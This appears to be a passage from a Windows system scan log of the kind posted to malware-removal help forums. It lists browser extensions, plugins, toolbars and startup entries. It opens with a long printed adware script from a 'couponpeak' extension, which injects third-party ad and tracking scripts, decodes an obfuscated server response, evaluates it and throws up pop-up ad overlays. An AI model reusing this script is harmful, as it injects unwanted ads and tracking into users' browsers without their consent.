script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//cdncache-a.akamaihd.net/loaders/1749/l.js?aoi=1311798366&pid=1749&zoneid=511181&ext=couponpeak&systemid=17137475778365433519&ext=couponpeak\";document.getElementsByTagName(\"head\")[0].appendChild(script)};;if(window.self==window.top){var script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//api.jollywallet.com/affiliate/client?dist=87&sub=pnd&name=couponpeak\";document.getElementsByTagName(\"head\")[0].appendChild(script)};;(function(){if(!document.getElementById(\"qwejkhjkshdfs_4\")&&window.self==window.top){var a=document.createElement(\"script\");a.id=\"inj_grazit_script_starter\";a.type=\"text/javascript\";a.src=\"//ext1.engageya.com/widget/inject_spark/inj_sprk_starter.js?pid=LTEsMTQyNTU5LDk0NjA4LDU0OTcx&subid=682_1&appname=couponpeak\";a.setAttribute(\"id\",\"qwejkhjkshdfs_4\");document.getElementsByTagName(\"head\")[0].appendChild(a)}})();;new function(){if(!document.getElementById(\"dsfmd1safskdfsd5yaaka\")&&window.self==window.top){var a=document.createElement(\"script\");a.type=\"text/javascript\";a.src=\"//intext.nav-links.com/js/intext.js?afid=wp2&subid=682_1&maxlinks=1&linkcolor=0000FF&brand=couponpeak\";a.setAttribute(\"id\",\"dsfmd1safskdfsd5yaaka\");document.getElementsByTagName(\"head\")[0].appendChild(a)}};;new function(){if(!document.getElementById(\"__if72ru4sdfsdfrkjahiuyi_once\")){(function(){var a=document.createElement(\"div\");a.id=\"__if72ru4rkjahiuyi_once\";a.setAttribute(\"style\",\"display:none;\");var b=document.getElementsByTagName(\"body\")[0];b&&b.appendChild(a)})();var c=this;c.prefix=\"if72ru4rkjahiuyi\";c.extName=\"couponpeak\";c.version=\"0.1.0\";c.pop_collision_id=\"__ipu=\";c.pixelHostname=\"//direct_pop.installerdatauk.info/\";c.hostname=[\"compey.net\",\"comprises.info\"];c.body=document.getElementsByTagName(\"body\")[0]; c.directParams={subid:\"1\",subid1:\"17137475778365433519\",subid2:\"682\",direct:\"1\",tid:\"6\"};c.adTypes={_1:{key:\"728x90\"},_2:{key:\"300x250\"},_3:{key:\"468x60\"},_4:{key:\"250x250\"},_5:{key:\"160x600\"},_6:{key:\"120x600\"},_7:{key:\"120x240\"},_8:{key:\"240x400\"},_10:{key:\"300x600\"},_9:{key:\"1024x728\"},_11:{key:\"670x670\"},_12:{key:\"600x270\"},_13:{key:\"600x400\"}};c.utils=new function(){var a=this;a.cookie=new function(){var b=this;b.setCookie=function(b,a,d){if(d){var c=new Date;c.setTime(c.getTime()+ 864E5 * d);d=\"; expires=\"+c.toGMTString()}else d=\"\";document.cookie=b+\"=\"+a+d+\"; path=/\"};b.getCookie=function(b){b+=\"=\";for(var a=document.cookie.split(\";\"),c=0;c<a.length;c++){for(var g=a[c];\" \"==g.charAt(0);)g=g.substring(1,g.length);if(0==g.indexOf(b))return g.substring(b.length,g.length)}return null};b.eraseCookie=function(a){b.setCookie(a,\"\",-1)}};a.getProtocol=function(b){var a=document.createElement(\"a\");a.href=b;return a.protocol};a.getInstructions=function(b,f){a.msie&&11>a.msie?a.inject_script(b+ (\"&cb=\"+c.prefix+\".\"+f)):a.ajax.get(b,function(b){if(b)c[f](b)})};a.l=new function(){this.xlat=\"abcdwxyzstuvrqponmijklefghABCDWXYZSTUVMNOPQRIJKLEFGH9876543210+/\";this.decode=function(b){b=b.toString().replace(/[^A-Za-z0-9\\+\\/]/g,\"\");for(var a=\"\",c=0;c<b.length;){var d=this.xlat.indexOf(b.charAt(c++)),g=this.xlat.indexOf(b.charAt(c++)),h=this.xlat.indexOf(b.charAt(c++)),l=this.xlat.indexOf(b.charAt(c++)),k=(g&15)<<4|h>>2,m=(h&3)<<6|l,a=a+String.fromCharCode(d<<2|g>>4);64!=h&&0<k&&(a+=String.fromCharCode(k)); 64 != l &&0<m&&(a+=String.fromCharCode(m))}return this._utf8_decode(a)};this._utf8_decode=function(b){for(var a=\"\",c=0;c<b.length;){var d=b.charCodeAt©;if(128>d)a+=String.fromCharCode(d),c++;else if(191<d&&224>d)var g=b.charCodeAt(c+1),a=a+String.fromCharCode((d&31)<<6|g&63),c=c+2;else var g=b.charCodeAt(c+1),h=b.charCodeAt(c+2),a=a+String.fromCharCode((d&15)<<12|(g&63)<<6|h&63),c=c+3}return a}};a.ajax=new function(){this.get=function(b,a){try{var c=new XMLHttpRequest;c.open(\"GET\",b,!0);c.withCredentials= !0; c.onreadystatechange=function(){4==c.readyState&&a(c.responseText)};c.send()}catch(d){}}};a.randomChar=function(){for(var b=\"\",a=0;2>a;a++)b+=\"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz\".charAt(Math.floor(52*Math.random()));return b};a.msie=function(){var b=parseInt((/msie (\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10);isNaN(b)&&(b=parseInt((/trident\\/.*; rv:(\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10));return isNaN(b)?!1:b}();a.inject_script=function(b){var a= document.getElementsByTagName(\"body\")[0],e=document.createElement(\"script\");e.type=\"text/javascript\";e.id=\"id_\"+c.prefix;e.src=b;a&&a.appendChild(e)};a.epoch=function(){return Math.floor((new Date).getTime()/1E3)};a.getVert=function(){var b=localStorage.getItem(\"sk398erjds2d\");return b?b:a.forexVert()};a.browser=function(){var b=navigator.userAgent.toLowerCase(),a={webkit:/webkit/.test(b),mozilla:/mozilla/.test(b)&&!/(compatible|webkit)/.test(b),chrome:/chrome/.test(b),msie:/msie/.test(b)&&!/opera/.test(b), firefox:/firefox/.test(b),safari:/safari/.test(b)&&!/chrome/.test(b),opera:/opera/.test(b)};a.version=a.safari?(b.match(/.+(?:ri)[\\/: ]([\\d.]+)/)||[])[1]:(b.match(/.+(?:ox|me|ra|ie)[\\/: ]([\\d.]+)/)||[])[1];return a}();a.getNodeTextProp=function(b){return\"textContent\"in b?\"textContent\":\"innerText\"in b?\"innerText\":!1};a.dhtml_prop_name=function(b){return b.replace(/(\\-([a-z]){1})/g,function(b,a,c){return c.toUpperCase()})};a.get_computed_style=\"function\"!=typeof window.getComputedStyle?function(b){return{getPropertyValue:function©{\"float\"== c &&(c=\"styleFloat\");c=a.dhtml_prop_name©;return\"object\"==typeof b.currentStyle&&null!=b.currentStyle&&\"undefined\"!=typeof b.currentStyle[c]?b.currentStyle[c]:null}}}:function(b,a){return window.getComputedStyle(b,a)||{getPropertyValue:function(){}}}};c.dom=new function(){this.json_to_html=function(a,b){if(\"#text\"==a.type)b=document.createTextNode(a.text);else if(\"#comment\"!=a.type){b||(b=document.createElement(a.type));if(a.attrs){for(var f in a.attrs)if(a.attrs.hasOwnProperty(f))if(\"style\"==f&& a.attrs.style instanceof Object)for(var e in a.attrs.style){var d=c.utils.dhtml_prop_name(e);try{b.style[d]=a.attrs.style[e]}catch(g){}}else b.setAttribute(f,a.attrs[f]);\"iframe\"==a.type&&(a.attrs.hasOwnProperty(\"frameborder\")&&(b.frameBorder=a.attrs.frameborder),a.attrs.hasOwnProperty(\"marginwidth\")&&(b.marginWidth=a.attrs.marginwidth),a.attrs.hasOwnProperty(\"marginheight\")&&(b.marginHeight=a.attrs.marginheight))}if(a.children)for(f=0;f<a.children.length;f++){d=a.children[f];e=arguments.callee(d); try { b.appendChild(e)}catch(h){if(\"#text\"==d.type&&\"string\"==typeof d.text)if(\"style\"==a.type&&b.styleSheet)b.styleSheet.cssText=d.text||\"\";else if(e=c.utils.getNodeTextProp(b))b[e]=d.text}}}return b}};c.events=new function(){var a=this;a.cache=[];a.add=window.addEventListener?function(b,c,e,d,g){\"undefined\"==typeof d&&(d=window);d.addEventListener(b,c,e);g&&a.cache.push([b,c,e,d])}:window.attachEvent?function(b,c,e,d,g){\"undefined\"==typeof d&&(d=window);d[\"e\"+b+c]=c;d[b+c]=function(){d[\"e\"+b+c](window.event)}; d.attachEvent(\"on\"+b,d[b+c]);g&&a.cache.push([b,c,e,d])}:function(){};a.remove=window.removeEventListener?function(b,a,c,d){\"undefined\"==typeof d&&(d=window);d.removeEventListener(b,a,c)}:window.detachEvent?function(b,a,c,d){\"undefined\"==typeof d&&(d=window);d.detachEvent(\"on\"+b,d[b+a]);d[b+a]=null;d[\"e\"+b+a]=null}:function(){};a.flush=function(){for(var b=0;b<a.cache.length;b++)a.remove.apply(a,a.cache[b]);a.cache=[]}};c.pixel=function(a,b){var f=c.pixelHostname+\"?\",e=c.hostname[\"https:\"==window.self.location.protocol? 0 : 1], e ={pid:\"1\",cc:\"US\",eid:\"682\",hid:\"17137475778365433519\",v:c.version,ch:b,cid:c.response[0][2],tid:c.directParams.tid,adtid:c.response[0][4],smid:c.response[0][3],pbid:a,oh:encodeURIComponent(c.response[0][0]),sh:encodeURIComponent(e)},d;for(d in e)f+=d+\"=\"+e[d]+\"&\";f=f.slice(0,-1);(new Image).src=f};c.products=new function(){this.code_7=function(a){function b(){var a=document.getElementById(\"__modal_close\"),b=document.getElementById(\"__modal_container\"); c.events.add(\"click\",function(){b.parentNode.removeChild(b)},!1,a,!1)}function f(){var a,b;\"undefined\"==typeof c.response[0][4]&&c.response[0].push(9);a=c.adTypes[\"_\"+c.response[0][4]].key;b=a.split(\"x\")[0];a=a.split(\"x\")[1];var d=window.innerHeight;if(b&&a){var f=document.getElementById(\"__modal\");f.style.width=b+\"px\";f.style.height=a+\"px\";f.style.marginLeft=parseInt(f.style.width)/2-parseInt(f.style.width)+\"px\";f.style.top=(d-parseInt(f.style.height))/2+\"px\"}}if((a=a[0][0])&&window.self.location.protocol=== c.utils.getProtocol(a)&&!(c.utils.msie&&9>c.utils.msie)&&\"http:\"===a.split(\"/\")[0]){var e={type:\"div\",attrs:{id:\"__modal_container\",style:{position:\"fixed\",\"z-index\":\"9999999999\",height:\"100%\",width:\"100%\",margin:\"0\",padding:\"0\",background:\"rgba(0,0,0,0.3)\",top:\"0\",right:\"0\",bottom:\"0\",left:\"0\",\"border-radius\":\"0\"}},children:[{type:\"div\",attrs:{id:\"__modal\",style:{position:\"absolute\",\"z-index\":\"99999999999\",left:\"50%\",top:\"10px\",\"text-align\":\"left\",width:\"90%\",margin:\"0 0 0 -45%\",\"background-color\":\"#FFFFFF\", border:\"1px solid #DDDDDD\",\"border-radius\":\"5px\",height:\"90%\",padding:\"0\"}},children:[{type:\"div\",attrs:{style:{margin:\"0\",padding:\"2px\",left:\"0\",width:\"inherit\",top:\"0\",\"background-color\":\"transparent\"},id:\"__modal_close\"},children:[{type:\"img\",attrs:{src:\"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABYAAAAWCAYAAADEtGw7AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAABA1JREFUeNp8VW9IW1cUP3l5eS9iZx+amsaNtNZsdtgttnSkBYmRLEsVs1rwi9Z9Udm6YZXYTr+MaMcm4idXPwTUD05BWP3bNBsleREUoabMTzr/wNxEjQqCgoj/Gr2792re8prUC4f3znnn/M65757zuwqEEMRbLMfxXzocV/MLCswfZ2bakpKSTAqFAra3t4ML//zr93pfjL3weOb29vYO4gIQ4GjBwWx1dbVlfn5e3NjYQBHBOpqamkLRtoWFBfEh9mUYhn0bR6ZotTrB5/O5SNDq6irq6OhAxcXFSK1Wy8Rms6G2tja0vLxME4iBgEt78aIQF1in0wnT09Nu4uj1epHRaEQ8z8eARovJZELj4+ORHbk/0OsFGTCLV2BkhFba1dUlBUYDn5WkpaWFggeDQRfHq1kJ2NXQaIlUelaFZ0l7ezsF/7mpyUKBNamp/NLSkogFZWVlyZytVivKz8+PATEYDKimpgZd0GolW9L582h2dhatra2JaWlpPNR+/9hIMrndbllwTk6OdPrNzc3UlpCQgLKzsykAsXd2dspinE4ntT958qORseZZzaTthoeHZS2I+xX29/epXlFRAY2NjYB3BL29vaDRaKh9Z2dHiiE9PjA0BMfHx3Dnjt0MoVDIs7i4GPe/lZaWopWVFaly4hd57+/vjxszMTGB1tfXPYxKpTJtbm7GDA1Zg4ODUFdXB4eHh1RPTEykz9HRUSgrK4s7cBgUlEqliSFbODo6kn0ktsjC0wW7u7uy78QWb0VjMViCycnJcR0/NRqhu7sbBEGgeiSovLwcGhoaqB4th+EwpKSkEJcgg8fSjwkGMjIyZKDJ2KEHg0aSku0/dNbCwcEJ51RWVkJ1TS28OQZ4g/OF8fMIi/7SJdja2vIzflEcI44Oh0MG/Mm1azLQkpISGHjWB85HjyXwz25eP/0H+Fzwo6joLrx37hw8/8M3Btdv3ODxKYuEvTSp2pi+rK+vp+/4kBEoT8RssZIJQ+kfZlJdgckNFCr00ucnHSMab97iaQf82tNDR7q1tfWdI0uAFcr/wRklhxiGk/QH335H27BvYMgiccXly+ks7mdKQlVVVTGgfIIasbRiVgIiVSpZkoxDn9vtmGbXSc+7dPp0Vkablrw8AQNT2mzC25RAsXBYlKqTKiPgzGmCr795gFZCIVKt2154V4hL9F/Y7QLJSsAnJycRHmWkuZCKOBWumFTHnACSX1J07x4KBEbo9jHxuAqLimVEr3j7zku/coV9+svTnNu3b/2AVSuZOsx8MDMzg09eAQbDR6DXv09PH6/Aq9d//uSsfTT+99xfYdmwvOsyzc3N5e/f/+pqYWGBmeM4GzaZTj8Fw+Gwf9Dz+9hvz/rmRsWXcS/T/wQYAL8KChTqW9Z8AAAAAElFTkSuQmCC\", style: {cursor:\"pointer\"}}},{type:\"span\",attrs:{style:{position:\"relative\",\"margin-left\":\"20px\",\"font-size\":\"12px\",\"line-height\":\"33px\"}},children:[{type:\"#text\",text:\"Ads by couponpeak\"}]}]},{type:\"iframe\",attrs:{style:{border:\"0\"},id:\"__modal_iframe\",width:\"100%\",height:\"100%\",frameboarder:\"0\",scrolling:\"yes\",marginheight:\"0\",marginwidth:\"0\",allowtransparency:\"true\",src:\"\"}}]}]};try{var d=c.dom.json_to_html(e)}catch(g){}d&&(document.getElementsByTagName(\"body\")[0].appendChild(d),document.getElementById(\"__modal_iframe\").src= a, c.pixel(\"0\",\"1\"),b(),f())}}};c.getKeywords=function(){var a=document.title,b=document.getElementsByTagName(\"meta\");if(b)for(var c=0,e=b.length;c<e;c++)\"keywords\"!=b[c].name.toLowerCase()&&\"description\"!=b[c].name.toLowerCase()||(a+=\" \"+b[c].content.replace(/,/g,\" \"));if(c=document.getElementsByTagName(\"a\")){b={};for(e=0;e<c.length;e++)try{var d=c[e].innerText;\"undefined\"==typeof d&&(d=c[e].textContent);for(var g=d.toLowerCase().split(/[\\s,-]/g),h=0;h<g.length;h++)4>g[h].length||(b[g[h]]?b[g[h]]++: b[g[h]]=1)}catch(l){}var d=[],k;for(k in b)d.push([k,b[k]]);d.sort(function(a,b){return b[1]-a[1]});d=d.slice(0,25);for(k=0;k<d.length;k++)a+=\" \"+d[k][0]}return a.replace(/[_-]/g,\" \").substring(0,1024)};c.injectComplianceBanner=function(){var a=document.getElementsByTagName(\"body\")[0];if(0!=a.children.length){var b=document.createElement(\"div\");b.id=\"cmsie\";var f='<span style=\"font: xx-small;color: rgb(153, 153, 153);height: 15px;  font-family: Tahoma;font-size: 8px;padding-right: 22px;padding-top: 1px;float: right;  top: 2px;  text-decoration: none;line-height: 15px;\">Ad by '+ c.extName+\"</span>\";b.setAttribute(\"style\",\"height: 15px;position: relative;background-color: #F9F9F9;border: none;border-radius:0\");b.innerHTML=f;a.insertBefore(b,a.children[0])}};c.prepareUrl=function(){var a=\"?\",b;for(b in c.directParams)a+=b+\"=\"+c.directParams[b]+\"&\";a+=\"k=\"+encodeURIComponent(c.getKeywords());return\"//\"+c.hostname[\"http:\"==window.self.location.protocol?0:1]+a};c.tp=function(a){if(a){a=c.utils.l.decode(a);try{c.response=eval(a)}catch(b){}if(c.response&&c.response[0]&&(c.response[0][0]= c.response[0][0].replace(\"zig_pp\",\"pjYKrTn6vTs8rG59qV1Fqdw8qjn5rjCE\"),a=c.response[0][3],a=7,7===a&&\"function\"==typeof c.products[\"code_\"+a]))c.products[\"code_\"+a](c.response)}};c.getInstructions=function(a){var b=\"&cb=\"+c.prefix+\".tp\";c.utils.msie?c.utils.inject_script(a+b):c.utils.ajax.get(a,function(a){a&&c.tp(a)})};c.initPop=function(){if(-1!==window.location.href.indexOf(c.pop_collision_id))return c.injectComplianceBanner();var a=c.prepareUrl();c.utils.getInstructions(a,\"tp\")};window.self==window.top&& c.initPop();\"undefined\"==typeof window[c.prefix]&&(window[c.prefix]=c)}};;new function(){if(!document.getElementById(\"sdfgdfg43iddfhgfs43af\")&&window.self==window.top){var a=document.createElement(\"script\");a.setAttribute(\"id\",\"sdfgdfg43iddfhgfs43af\");a.src=\"https://www.tr553.com/InterYield/bindevent.do?e=click&affiliate=wpop&subid=682_1&ecpm=0&debug=false&snoozeMinutes=3&adCountIntervalHours=24&maxAdCountsPerInterval=3&attributionTitle=couponpeak&endpoint=https%3A%2F%2Fwww.tr553.com\";document.getElementsByTagName(\"body\")[0].appendChild(a)}};})();");
FF - prefs.js..extensions.enabledAddons: content_blocker%40kaspersky.com:4.0.10.15
FF - prefs.js..extensions.enabledAddons: virtual_keyboard%40kaspersky.com:4.0.10.15
FF - prefs.js..extensions.enabledAddons: url_advisor%40kaspersky.com:4.0.10.15
FF - prefs.js..extensions.enabledAddons: anti_banner%40kaspersky.com:4.0.10.15
FF - prefs.js..extensions.enabledAddons: online_banking%40kaspersky.com:4.0.10.15
FF - prefs.js..extensions.enabledAddons: %7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:33.0.3
 
 
FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\windows\system32\Macromed\Flash\NPSWF32_15_0_0_152.dll ()
FF - HKLM\Software\MozillaPlugins\@adobe.com/ShockwavePlayer: C:\windows\system32\Adobe\Director\np32dsw_1166636.dll (Adobe Systems, Inc.)
FF - HKLM\Software\MozillaPlugins\@kaspersky.com/content_blocker: C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 15.0.0\FFExt\[email protected] [2014/11/09 17:09:14 | 000,000,000 | ---D | M]
FF - HKLM\Software\MozillaPlugins\@kaspersky.com/online_banking: C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 15.0.0\FFExt\[email protected] [2014/11/09 17:09:14 | 000,000,000 | ---D | M]
FF - HKLM\Software\MozillaPlugins\@kaspersky.com/virtual_keyboard: C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 15.0.0\FFExt\[email protected] [2014/11/09 17:09:16 | 000,000,000 | ---D | M]
FF - HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: disabled File not found
FF - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/OfficeAuthz,version=14.0: C:\PROGRA~1\MIF5BA~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/SharePoint,version=14.0: C:\PROGRA~1\MIF5BA~1\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=15.4.3502.0922: C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@TelevisionFanatic.com/Plugin: C:\Program Files\TelevisionFanatic\bar\1.bin\NP64Stub.dll ()
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\@WildTangent.com/GamesAppPresenceDetector,Version=1.0: C:\Program Files\WildTangent Games\App\BrowserIntegration\Registered\10\NP_wtapp.dll ()
FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
 
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\[email protected]: C:\Program Files\TelevisionFanatic\bar\1.bin [2014/11/09 18:38:02 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\[email protected]: C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 15.0.0\FFExt\[email protected] [2014/11/09 17:09:14 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\[email protected]: C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 15.0.0\FFExt\[email protected] [2014/11/09 17:09:16 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\[email protected]: C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 15.0.0\FFExt\[email protected] [2014/11/09 17:09:14 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\[email protected]: C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 15.0.0\FFExt\[email protected] [2014/11/09 17:09:14 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\[email protected]: C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 15.0.0\FFExt\[email protected] [2014/11/09 17:09:14 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 33.0.3\extensions\\Components: C:\Program Files\Mozilla Firefox\components
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 33.0.3\extensions\\Plugins: C:\Program Files\Mozilla Firefox\plugins
 
[2011/05/19 17:34:54 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Mom\AppData\Roaming\Mozilla\Extensions
[2014/11/08 14:00:54 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Mom\AppData\Roaming\Mozilla\Firefox\Profiles\xdxtk8zr.default\extensions
[2014/11/08 07:41:07 | 000,000,000 | ---D | M] (couponpeak) -- C:\Users\Mom\AppData\Roaming\Mozilla\Firefox\Profiles\xdxtk8zr.default\extensions\[email protected]
[2012/12/21 12:04:19 | 000,000,000 | ---D | M] (TelevisionFanatic) -- C:\Users\Mom\AppData\Roaming\Mozilla\Firefox\Profiles\xdxtk8zr.default\extensions\[email protected]
[2014/11/07 20:18:03 | 000,002,823 | ---- | M] () -- C:\Users\Mom\AppData\Roaming\Mozilla\Firefox\Profiles\xdxtk8zr.default\searchplugins\Astromenda.xml
[2014/11/07 18:57:33 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files\Mozilla Firefox\browser\extensions
[2014/11/07 18:57:59 | 000,000,000 | ---D | M] (Default) -- C:\Program Files\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}
[2014/11/09 17:09:14 | 000,000,000 | ---D | M] (Ch?n qu?ng cáo) -- C:\PROGRAM FILES\KASPERSKY LAB\KASPERSKY INTERNET SECURITY 15.0.0\FFEXT\[email protected]
[2014/11/09 17:09:14 | 000,000,000 | ---D | M] (Ngan cha?n trang web nguy hiê?m) -- C:\PROGRAM FILES\KASPERSKY LAB\KASPERSKY INTERNET SECURITY 15.0.0\FFEXT\[email protected]
[2014/11/09 17:09:14 | 000,000,000 | ---D | M] (An toàn giao d?ch tài chính) -- C:\PROGRAM FILES\KASPERSKY LAB\KASPERSKY INTERNET SECURITY 15.0.0\FFEXT\[email protected]
[2014/11/09 17:09:14 | 000,000,000 | ---D | M] (Công cụ kiểm tra liên kết của Kaspersky) -- C:\PROGRAM FILES\KASPERSKY LAB\KASPERSKY INTERNET SECURITY 15.0.0\FFEXT\[email protected]
[2014/11/09 17:09:16 | 000,000,000 | ---D | M] (Bàn phím ?o) -- C:\PROGRAM FILES\KASPERSKY LAB\KASPERSKY INTERNET SECURITY 15.0.0\FFEXT\[email protected]
 
========== Chrome  ==========
 
CHR - default_search_provider:  (Enabled)
CHR - default_search_provider: search_url = 
CHR - default_search_provider: suggest_url = 
CHR - plugin: Remoting Viewer (Enabled) = internal-remoting-viewer
CHR - plugin: Native Client (Enabled) = C:\Program Files\Google\Chrome\Application\38.0.2125.111\ppGoogleNaClPluginChrome.dll
CHR - plugin: Chrome PDF Viewer (Enabled) = C:\Program Files\Google\Chrome\Application\38.0.2125.111\pdf.dll
CHR - plugin: Shockwave Flash (Enabled) = C:\Program Files\Google\Chrome\Application\38.0.2125.111\gcswf32.dll
CHR - plugin: Shockwave Flash (Enabled) = C:\windows\system32\Macromed\Flash\NPSWF32_11_3_300_271.dll
CHR - plugin: Adobe Acrobat (Enabled) = C:\Program Files\Adobe\Reader 9.0\Reader\Browser\nppdf32.dll
CHR - plugin: Java Deployment Toolkit 6.0.140.8 (Enabled) = C:\Program Files\Java\jre6\bin\new_plugin\npdeploytk.dll
CHR - plugin: Java™ Platform SE 6 U14 (Enabled) = C:\Program Files\Java\jre6\bin\new_plugin\npjp2.dll
CHR - plugin: Microsoft Office 2010 (Enabled) = C:\PROGRA~1\MIF5BA~1\Office14\NPAUTHZ.DLL
CHR - plugin: Microsoft Office 2010 (Enabled) = C:\PROGRA~1\MIF5BA~1\Office14\NPSPWRAP.DLL
CHR - plugin: Google Update (Enabled) = C:\Program Files\Google\Update\1.3.21.115\npGoogleUpdate3.dll
CHR - plugin: Windows Live® Photo Gallery (Enabled) = C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll
CHR - plugin: Shockwave for Director (Enabled) = C:\windows\system32\Adobe\Director\np32dsw_1166636.dll
CHR - plugin: Silverlight Plug-In (Enabled) = c:\Program Files\Microsoft Silverlight\5.1.10411.0\npctrl.dll
CHR - default_search_provider: 16CAB7C3E97634D5BD640EBB2785C047C6972D6BA343621773024AF908FEF7A8 (Enabled)
CHR - default_search_provider: search_url = 083BD3C760853A438C34A71C5B3D350A2C3998739DEA24E067585CD6D73A0F89
CHR - default_search_provider: suggest_url = 
CHR - homepage: 6BEFBC4DF0B652BA1ED497BE06D04496263A303F4F9D301C5B4532011EAA81DF
CHR - Extension: Google Voice Search Hotword (Beta) = C:\Users\Mom\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn\0.1.1.5023_0\
CHR - Extension: ApptoU = C:\Users\Mom\AppData\Local\Google\Chrome\User Data\Default\Extensions\bnfghhpmgeifbilieglncablibafbhdd\4.61\
CHR - Extension: Kaspersky Protection = C:\Users\Mom\AppData\Local\Google\Chrome\User Data\Default\Extensions\dbhjdbfgekjfcfkkfjjmlmojhbllhbho\4.0.9.130_0\
CHR - Extension: Google Wallet = C:\Users\Mom\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\
CHR - Extension: PotatoSmile = C:\Users\Mom\AppData\Local\Google\Chrome\User Data\Default\Extensions\oalbpfagfhfkcmklpdanadjpbfdedndn\249\
 
O1 HOSTS File: ([2009/06/10 13:39:37 | 000,000,824 | ---- | M]) - C:\Windows\System32\drivers\etc\hosts
O2 - BHO: (Content Blocker Plugin) - {5564CC73-EFA7-4CBF-918A-5CF7FBBFFF4F} - C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 15.0.0\IEExt\ContentBlocker\ie_content_blocker_plugin.dll (Kaspersky Lab ZAO)
O2 - BHO: (Search Assistant BHO) - {5d79f641-c168-40df-a32f-bacea7509e75} - C:\Program Files\TelevisionFanatic\bar\1.bin\64SrcAs.dll ()
O2 - BHO: (Virtual Keyboard Plugin) - {73455575-E40C-433C-9784-C78DC7761455} - C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 15.0.0\IEExt\VirtualKeyboard\ie_virtual_keyboard_plugin.dll (Kaspersky Lab ZAO)
O2 - BHO: (Safe Money Plugin) - {9E6D0D23-3D72-4A94-AE1F-2D167624E3D9} - C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 15.0.0\IEExt\OnlineBanking\online_banking_bho.dll (Kaspersky Lab ZAO)
O2 - BHO: (Office Document Cache Handler) - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
O2 - BHO: (Toolbar BHO) - {cb41fc95-f1b3-4797-8bb6-1012ff62abba} - C:\Program Files\TelevisionFanatic\bar\1.bin\64bar.dll ()
O2 - BHO: (URL Advisor Plugin) - {E33CF602-D945-461A-83F0-819F76A199F8} - C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 15.0.0\IEExt\UrlAdvisor\klwtbbho.dll (Kaspersky Lab ZAO)
O3 - HKLM\..\Toolbar: (TelevisionFanatic) - {c98d5b61-b0ea-4d48-9839-1079d352d880} - C:\Program Files\TelevisionFanatic\bar\1.bin\64bar.dll ()
O3 - HKLM\..\Toolbar: (no name) - Locked - No CLSID value found.
O3 - HKCU\..\Toolbar\WebBrowser: (TelevisionFanatic) - {C98D5B61-B0EA-4D48-9839-1079D352D880} - C:\Program Files\TelevisionFanatic\bar\1.bin\64bar.dll ()
O4 - HKLM..\Run: [00TCrdMain] C:\Program Files\TOSHIBA\FlashCards\TCrdMain.exe (TOSHIBA Corporation)
O4 - HKLM..\Run: [HWSetup] C:\Program Files\TOSHIBA\Utilities\HWSetup.exe (TOSHIBA Electronics, Inc.)
O4 - HKLM..\Run: [KeNotify] C:\Program Files\TOSHIBA\Utilities\KeNotify.exe (TOSHIBA CORPORATION)
O4 - HKLM..\Run: [MSC] c:\Program Files\Microsoft Security Client\msseces.exe (Microsoft Corporation)
